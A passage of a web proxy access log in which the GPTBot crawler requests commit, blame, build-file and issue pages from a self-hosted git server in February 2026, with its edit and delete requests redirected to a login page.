GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 10629] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 10063] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 10633] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 10449] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10223] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10224] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9944] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:16:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9949] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:16:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9945] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:16:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10117] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10124] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10114] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject" [Client 74.7.227.38] [Length 212891] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:16:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject" [Client 74.7.227.38] [Length 362250] [Gzip 16.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" +[17/Feb/2026:16:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" +[17/Feb/2026:16:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" +[17/Feb/2026:16:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" +[17/Feb/2026:16:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11797] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" +[17/Feb/2026:16:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14718] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14714] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects?q=&sort=alphabetically&state=open" [Client 74.7.227.38] [Length 6802] [Gzip 2.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/-/projects" +[17/Feb/2026:16:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11043] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11043] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 11064] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:16:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11118] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21647] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9979] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21631] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9977] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9979] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9978] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21634] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:55:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:16:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:16:55:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:16:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:16:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21634] 